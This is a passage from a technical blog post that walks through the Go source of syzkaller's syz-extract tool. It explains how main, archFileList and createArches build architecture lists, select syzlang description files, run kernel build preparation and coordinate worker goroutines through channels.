implementation of the three interface methods) is located in <code>sys/syz-extract/linux.go</code>:</p><blockquote><p>We will look at the implementation of these three methods later.</p></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">type</span> Extractor <span class="keyword">interface</span> &#123;</span><br><span class="line">    prepare(sourcedir <span class="type">string</span>, build <span class="type">bool</span>, arches []*Arch) <span class="type">error</span></span><br><span class="line">    prepareArch(arch *Arch) <span class="type">error</span></span><br><span class="line">    processFile(arch *Arch, info *compiler.ConstInfo) (<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>, <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>, <span class="type">error</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> extractors = <span class="keyword">map</span>[<span class="type">string</span>]Extractor&#123;</span><br><span class="line">    targets.Akaros:  <span class="built_in">new</span>(akaros),</span><br><span class="line">    targets.Linux:   <span class="built_in">new</span>(linux), <span class="comment">// sys/syz-extract/linux.go</span></span><br><span class="line">    targets.FreeBSD: <span class="built_in">new</span>(freebsd),</span><br><span class="line">    targets.Darwin:  <span class="built_in">new</span>(darwin),</span><br><span class="line">    targets.NetBSD:  <span class="built_in">new</span>(netbsd),</span><br><span class="line">    targets.OpenBSD: <span class="built_in">new</span>(openbsd),</span><br><span class="line">    <span class="string">&quot;android&quot;</span>:       <span class="built_in">new</span>(linux),</span><br><span class="line">    targets.Fuchsia: <span class="built_in">new</span>(fuchsia),</span><br><span class="line">    
targets.Windows: <span class="built_in">new</span>(windows),</span><br><span class="line">    targets.Trusty:  <span class="built_in">new</span>(trusty),</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Back in main, syz-extract uses the <strong>OS string, the archArray string slice, and the slice of syzlang file names</strong> it already has to build the corresponding <strong>arches slice of Arch structs</strong>:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `main`</span></span><br><span class="line">arches, err := createArches(OS, archArray, files)</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">    tool.Fail(err)</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> *flagSourceDir == <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">    tool.Fail(fmt.Errorf(<span class="string">&quot;provide path to kernel checkout via -sourcedir &quot;</span> +</span><br><span class="line">                         <span class="string">&quot;flag (or make extract SOURCEDIR)&quot;</span>))</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The preparation is almost done. Next, the extractor performs its own initialization:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function main</span></span><br><span class="line"><span class="keyword">if</span> err := 
extractor.prepare(*flagSourceDir, *flagBuild, arches); err != <span class="literal">nil</span> &#123;</span><br><span class="line">    tool.Fail(err)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This call ends up in the <code>prepare</code> method in <code>sys/syz-extract/linux.go</code>:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in sys/syz-extract/linux.go</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(*linux)</span></span> prepare(sourcedir <span class="type">string</span>, build <span class="type">bool</span>, arches []*Arch) <span class="type">error</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> build &#123;</span><br><span class="line">        <span class="comment">// Run &#x27;make mrproper&#x27;, otherwise out-of-tree build fails.</span></span><br><span class="line">        <span class="comment">// However, it takes unreasonable amount of 
time,</span></span><br><span class="line">        <span class="comment">// so first check few files and if they are missing hope for best.</span></span><br><span class="line">        <span class="keyword">for</span> _, a := <span class="keyword">range</span> arches &#123;</span><br><span class="line">            arch := a.target.KernelArch</span><br><span class="line">            <span class="keyword">if</span> osutil.IsExist(filepath.Join(sourcedir, <span class="string">&quot;.config&quot;</span>)) ||</span><br><span class="line">                osutil.IsExist(filepath.Join(sourcedir, <span class="string">&quot;init/main.o&quot;</span>)) ||</span><br><span class="line">                osutil.IsExist(filepath.Join(sourcedir, <span class="string">&quot;include/config&quot;</span>)) ||</span><br><span class="line">                osutil.IsExist(filepath.Join(sourcedir, <span class="string">&quot;include/generated/compile.h&quot;</span>)) ||</span><br><span class="line">                osutil.IsExist(filepath.Join(sourcedir, <span class="string">&quot;arch&quot;</span>, arch, <span class="string">&quot;include&quot;</span>, <span class="string">&quot;generated&quot;</span>)) &#123;</span><br><span class="line">                fmt.Printf(<span class="string">&quot;make mrproper ARCH=%v\n&quot;</span>, arch)</span><br><span class="line">                out, err := osutil.RunCmd(time.Hour, sourcedir, <span class="string">&quot;make&quot;</span>, <span class="string">&quot;mrproper&quot;</span>, <span class="string">&quot;ARCH=&quot;</span>+arch,</span><br><span class="line">                    <span class="string">&quot;-j&quot;</span>, fmt.Sprint(runtime.NumCPU()))</span><br><span class="line">                <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">                    <span class="keyword">return</span> fmt.Errorf(<span class="string">&quot;make mrproper failed: %v\n%s&quot;</span>, err, 
out)</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(arches) &gt; <span class="number">1</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> fmt.Errorf(<span class="string">&quot;more than 1 arch is invalid without -build&quot;</span>)</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If <strong>regenerating the Linux kernel headers</strong> is not requested (no <code>-build</code>), prepare only performs a simple check: at most one arch may be specified. If regeneration is requested, it runs <code>make mrproper</code> in the Linux kernel source tree whenever it finds leftovers of an earlier build there.</p><p>Back in main, the next step is to create the channel used to hand jobs to the goroutines and to start the parallel workers:</p><blockquote><p>A goroutine is Go's lightweight thread. The function call that follows the <code>go</code> keyword is executed in a new goroutine.</p></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">jobC := <span class="built_in">make</span>(<span class="keyword">chan</span> <span class="keyword">interface</span>&#123;&#125;, <span class="built_in">len</span>(archArray)*<span class="built_in">len</span>(files))</span><br><span class="line"><span class="comment">// Put the arch structs into the jobC channel</span></span><br><span class="line"><span class="keyword">for</span> _, arch := <span class="keyword">range</span> arches &#123;</span><br><span class="line">    jobC 
&lt;- arch</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> p := <span class="number">0</span>; p &lt; runtime.GOMAXPROCS(<span class="number">0</span>); p++ &#123;</span><br><span class="line">    <span class="keyword">go</span> worker(extractor, jobC)</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Once the workers are running, main has to wait for them to finish before it can save the results to files, which requires synchronizing with the goroutines. Note the <code>&lt;-arch.done</code> and <code>&lt;-f.done</code> statements in the code: each one blocks until a value arrives on the channel. When a worker closes the channel instead, a receive on the closed channel returns immediately, so main stops waiting and moves on. In this way syz-extract uses channels to synchronize main with its workers.</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `main`</span></span><br><span class="line">constFiles := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]*compiler.ConstFile)</span><br><span class="line"><span class="keyword">for</span> _, file := <span class="keyword">range</span> files &#123;</span><br><span class="line">    constFiles[file] = compiler.NewConstFile()</span><br><span class="line">&#125;</span><br><span 
class="line"><span class="keyword">for</span> _, arch := <span class="keyword">range</span> arches &#123;</span><br><span class="line">    fmt.Printf(<span class="string">&quot;generating %v/%v...\n&quot;</span>, arch.target.OS, arch.target.Arch)</span><br><span class="line">    &lt;-arch.done</span><br><span class="line">    <span class="keyword">if</span> arch.err != <span class="literal">nil</span> &#123;</span><br><span class="line">        failed = <span class="literal">true</span></span><br><span class="line">        fmt.Printf(<span class="string">&quot;%v\n&quot;</span>, arch.err)</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> _, f := <span class="keyword">range</span> arch.files &#123;</span><br><span class="line">        &lt;-f.done</span><br><span class="line">        <span class="keyword">if</span> f.err != <span class="literal">nil</span> &#123;</span><br><span class="line">            failed = <span class="literal">true</span></span><br><span class="line">            fmt.Printf(<span class="string">&quot;%v: %v\n&quot;</span>, f.name, f.err)</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        &#125;</span><br><span class="line">        constFiles[f.name].AddArch(f.arch.target.Arch, f.consts, f.undeclared)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The remaining code simply writes the results to the <code>.const</code> files; there is nothing else of interest:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `main`</span></span><br><span class="line"><span class="keyword">for</span> file, cf := <span class="keyword">range</span> constFiles &#123;</span><br><span class="line">    outname := filepath.Join(<span class="string">&quot;sys&quot;</span>, OS, file+<span class="string">&quot;.const&quot;</span>)</span><br><span class="line">    data := cf.Serialize()</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(data) == <span class="number">0</span> &#123;</span><br><span class="line">        os.Remove(outname)</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> err := osutil.WriteFile(outname, data); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        tool.Failf(<span class="string">&quot;failed to write output file: %v&quot;</span>, err)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> !failed &amp;&amp; *flagArch == <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">    failed = checkUnsupportedCalls(arches)</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">for</span> _, arch := <span class="keyword">range</span> arches &#123;</span><br><span class="line">    
<span class="keyword">if</span> arch.build &#123;</span><br><span class="line">        os.RemoveAll(arch.buildDir)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> failed &#123;</span><br><span class="line">    os.Exit(<span class="number">1</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="2-archFileList">2. archFileList</h3><p>archFileList parses the arguments passed in; it is a very short function.</p><p>First, the caller passes in the <strong>OS string</strong>, the <strong>arch string</strong>, and the <strong>string slice holding the syzlang file paths</strong>:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">archFileList</span><span class="params">(os, arch <span class="type">string</span>, files []<span class="type">string</span>)</span></span> </span><br><span class="line">    (<span class="type">string</span>, []<span class="type">string</span>, []<span class="type">string</span>, <span class="type">error</span>) </span><br></pre></td></tr></table></figure><p>archFileList then special-cases android (the OS is mapped to Linux), splits the arch argument on commas, and stores the pieces in the <strong>string slice arches</strong>. If no arch argument is given, every arch known for the OS is added to arches; for android, a fixed list of four arches is used instead.</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in archFileList Function</span></span><br><span class="line"><span class="comment">// Note: this is linux-specific and should be part of Extractor and moved to linux.go.</span></span><br><span class="line">android := <span class="literal">false</span></span><br><span class="line"><span class="keyword">if</span> os == <span class="string">&quot;android&quot;</span> &#123;</span><br><span class="line">    android = <span class="literal">true</span></span><br><span class="line">    os = targets.Linux</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">var</span> arches []<span class="type">string</span></span><br><span class="line"><span class="keyword">if</span> arch != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">    arches = strings.Split(arch, <span class="string">&quot;,&quot;</span>)</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">for</span> arch := <span class="keyword">range</span> targets.List[os] &#123;</span><br><span class="line">        arches = <span class="built_in">append</span>(arches, arch)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> android &#123;</span><br><span class="line">        arches = []<span class="type">string</span>&#123;targets.I386, targets.AMD64, targets.ARM, targets.ARM64&#125;</span><br><span class="line">    &#125;</span><br><span class="line">    sort.Strings(arches)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Here, <code>targets.List</code> is a map (the List variable in <code>sys/targets/targets.go</code>) that holds a great deal of information about each OS and about that OS on each specific arch. Below is a trimmed-down excerpt:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// nolint: lll</span></span><br><span class="line"><span class="keyword">var</span> List = <span class="keyword">map</span>[<span class="type">string</span>]<span class="keyword">map</span>[<span class="type">string</span>]*Target&#123;</span><br><span class="line">    ...,</span><br><span class="line">    Linux: &#123;</span><br><span class="line">        AMD64: &#123;</span><br><span class="line">            PtrSize:          <span class="number">8</span>,</span><br><span class="line">            PageSize:         <span class="number">4</span> &lt;&lt; <span class="number">10</span>,</span><br><span class="line">            LittleEndian:     <span class="literal">true</span>,</span><br><span class="line">            CFlags:           []<span class="type">string</span>&#123;<span class="string">&quot;-m64&quot;</span>&#125;,</span><br><span class="line">            
Triple:           <span class="string">&quot;x86_64-linux-gnu&quot;</span>,</span><br><span class="line">            KernelArch:       <span class="string">&quot;x86_64&quot;</span>,</span><br><span class="line">            KernelHeaderArch: <span class="string">&quot;x86&quot;</span>,</span><br><span class="line">            NeedSyscallDefine: <span class="function"><span class="keyword">func</span><span class="params">(nr <span class="type">uint64</span>)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line">                <span class="comment">// Only generate defines for new syscalls</span></span><br><span class="line">                <span class="comment">// (added after commit 8a1ab3155c2ac on 2012-10-04).</span></span><br><span class="line">                <span class="keyword">return</span> nr &gt;= <span class="number">313</span></span><br><span class="line">            &#125;,</span><br><span class="line">        &#125;,</span><br><span class="line">        I386: &#123;</span><br><span class="line">            VMArch:           AMD64,</span><br><span class="line">            PtrSize:          <span class="number">4</span>,</span><br><span class="line">            PageSize:         <span class="number">4</span> &lt;&lt; <span class="number">10</span>,</span><br><span class="line">            Int64Alignment:   <span class="number">4</span>,</span><br><span class="line">            LittleEndian:     <span class="literal">true</span>,</span><br><span class="line">            CFlags:           []<span class="type">string</span>&#123;<span class="string">&quot;-m32&quot;</span>&#125;,</span><br><span class="line">            Triple:           <span class="string">&quot;x86_64-linux-gnu&quot;</span>,</span><br><span class="line">            KernelArch:       <span class="string">&quot;i386&quot;</span>,</span><br><span class="line">            KernelHeaderArch: <span class="string">&quot;x86&quot;</span>,</span><br><span class="line"> 
       &#125;,</span><br><span class="line">        ...</span><br><span class="line">    &#125;,</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>However, <code>for arch := range targets.List[os]</code> only iterates over the keys of that map, i.e. the architecture name strings, so the arches slice ends up holding the following values:</p><p><img src="/2022/03/syzkaller-1/image-20220309090646115.png" alt="image-20220309090646115"></p><p>Now let's return to the archFileList function:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in archFileList Function</span></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(files) == <span class="number">0</span> 
&#123;</span><br><span class="line">        matches, err := filepath.Glob(filepath.Join(<span class="string">&quot;sys&quot;</span>, os, <span class="string">&quot;*.txt&quot;</span>))</span><br><span class="line">        <span class="keyword">if</span> err != <span class="literal">nil</span> || <span class="built_in">len</span>(matches) == <span class="number">0</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&quot;&quot;</span>, <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to find sys files: %v&quot;</span>, err)</span><br><span class="line">        &#125;</span><br><span class="line">        manualFiles := <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>&#123;</span><br><span class="line">            <span class="comment">// Not upstream, generated on https://github.com/multipath-tcp/mptcp_net-next</span></span><br><span class="line">            <span class="string">&quot;vnet_mptcp.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// Was in linux-next, but then was removed, fate is unknown.</span></span><br><span class="line">            <span class="string">&quot;dev_watch_queue.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// Not upstream, generated on:</span></span><br><span class="line">            <span class="comment">// https://chromium.googlesource.com/chromiumos/third_party/kernel d2a8a1eb8b86</span></span><br><span class="line">            <span class="string">&quot;dev_bifrost.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// ION support was removed from kernel.</span></span><br><span class="line">            <span class="comment">// We plan to leave the descriptions for 
some time as is and later remove them.</span></span><br><span class="line">            <span class="string">&quot;dev_ion.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// Not upstream, generated on unknown tree.</span></span><br><span class="line">            <span class="string">&quot;dev_img_rogue.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">        &#125;</span><br><span class="line">        androidFiles := <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>&#123;</span><br><span class="line">            <span class="string">&quot;dev_tlk_device.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// This was generated on:</span></span><br><span class="line">            <span class="comment">// https://source.codeaurora.org/quic/la/kernel/msm-4.9 msm-4.9</span></span><br><span class="line">            <span class="string">&quot;dev_video4linux.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// This was generated on:</span></span><br><span class="line">            <span class="comment">// https://chromium.googlesource.com/chromiumos/third_party/kernel 3a36438201f3</span></span><br><span class="line">            <span class="string">&quot;fs_incfs.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">for</span> _, f := <span class="keyword">range</span> matches &#123;</span><br><span class="line">            f = filepath.Base(f)</span><br><span class="line">            <span class="keyword">if</span> manualFiles[f] || os == targets.Linux &amp;&amp; android != androidFiles[f] &#123;</span><br><span class="line">                <span class="keyword">continue</span></span><br><span 
class="line">            &#125;</span><br><span class="line">            files = <span class="built_in">append</span>(files, f)</span><br><span class="line">        &#125;</span><br><span class="line">        sort.Strings(files)</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure><p>If the <code>files</code> argument is empty, syz-extract collects the file list automatically. In this part of the code:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">matches, err := filepath.Glob(filepath.Join(<span class="string">&quot;sys&quot;</span>, os, <span class="string">&quot;*.txt&quot;</span>))</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> || <span class="built_in">len</span>(matches) == <span class="number">0</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>, <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to find sys files: %v&quot;</span>, err)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>syz-extract expands the glob pattern <code>sys/linux/*.txt</code> and stores the matching paths in the matches slice:</p><p><img src="/2022/03/syzkaller-1/image-20220309090909852.png" alt="image-20220309090909852"></p><p>Next, the code below skips the manually maintained files listed in manualFiles. On Linux it also skips every file whose membership in androidFiles does not match the android flag: a regular Linux run drops the Android-only files, while an Android run keeps only those files. Finally, the resulting slice is sorted:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: 
in archFileList Function</span></span><br><span class="line"><span class="keyword">for</span> _, f := <span class="keyword">range</span> matches &#123;</span><br><span class="line">    f = filepath.Base(f)</span><br><span class="line">    <span class="keyword">if</span> manualFiles[f] || os == targets.Linux &amp;&amp; android != androidFiles[f] &#123;</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    &#125;</span><br><span class="line">    files = <span class="built_in">append</span>(files, f)</span><br><span class="line">&#125;</span><br><span class="line">sort.Strings(files)</span><br></pre></td></tr></table></figure><p>The function then returns its results:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in archFileList Function</span></span><br><span class="line"><span class="keyword">return</span> os, arches, files, <span class="literal">nil</span></span><br></pre></td></tr></table></figure><h3 id="3-createArches">3. 
createArches</h3><p>This function builds the slice of Arch structs that corresponds to its arguments. The function is short, so the notes are embedded as comments in the code:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">createArches</span><span class="params">(OS <span class="type">string</span>, archArray, files []<span 
class="type">string</span>)</span></span> ([]*Arch, <span class="type">error</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> arches []*Arch</span><br><span class="line">    <span class="comment">// Iterate over the architecture names in archArray</span></span><br><span class="line">    <span class="keyword">for</span> _, archStr := <span class="keyword">range</span> archArray &#123;</span><br><span class="line">        <span class="comment">// Determine the build directory path</span></span><br><span class="line">        buildDir := <span class="string">&quot;&quot;</span></span><br><span class="line">        <span class="keyword">if</span> *flagBuild &#123;</span><br><span class="line">            dir, err := ioutil.TempDir(<span class="string">&quot;&quot;</span>, <span class="string">&quot;syzkaller-kernel-build&quot;</span>)</span><br><span class="line">            <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to create temp dir: %v&quot;</span>, err)</span><br><span class="line">            &#125;</span><br><span class="line">            buildDir = dir</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> *flagBuildDir != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">            buildDir = *flagBuildDir</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            buildDir = *flagSourceDir</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Look up the `Target` struct for this OS and arch in targets.List</span></span><br><span class="line">        target := targets.Get(OS, archStr)</span><br><span class="line">        <span class="keyword">if</span> target == <span class="literal">nil</span> 
&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;unknown arch: %v&quot;</span>, archStr)</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Create the Arch struct</span></span><br><span class="line">        arch := &amp;Arch&#123;</span><br><span class="line">            <span class="comment">// Target information for this specific OS and arch</span></span><br><span class="line">            target:      target,</span><br><span class="line">            <span class="comment">// Path to the kernel source</span></span><br><span class="line">            sourceDir:   *flagSourceDir,</span><br><span class="line">            <span class="comment">// Kernel header include paths</span></span><br><span class="line">            includeDirs: *flagIncludes,</span><br><span class="line">            <span class="comment">// Build directory path</span></span><br><span class="line">            buildDir:    buildDir,</span><br><span class="line">            <span class="comment">// bool: whether to regenerate the arch-specific kernel headers</span></span><br><span class="line">            build:       *flagBuild,</span><br><span class="line">            <span class="comment">// Channel for communication between goroutines; signaled once this arch has been processed</span></span><br><span class="line">            done:        <span class="built_in">make</span>(<span class="keyword">chan</span> <span class="type">bool</span>),</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Attach the syzlang file names to the Arch struct</span></span><br><span class="line">        <span class="keyword">for</span> _, f := <span class="keyword">range</span> files 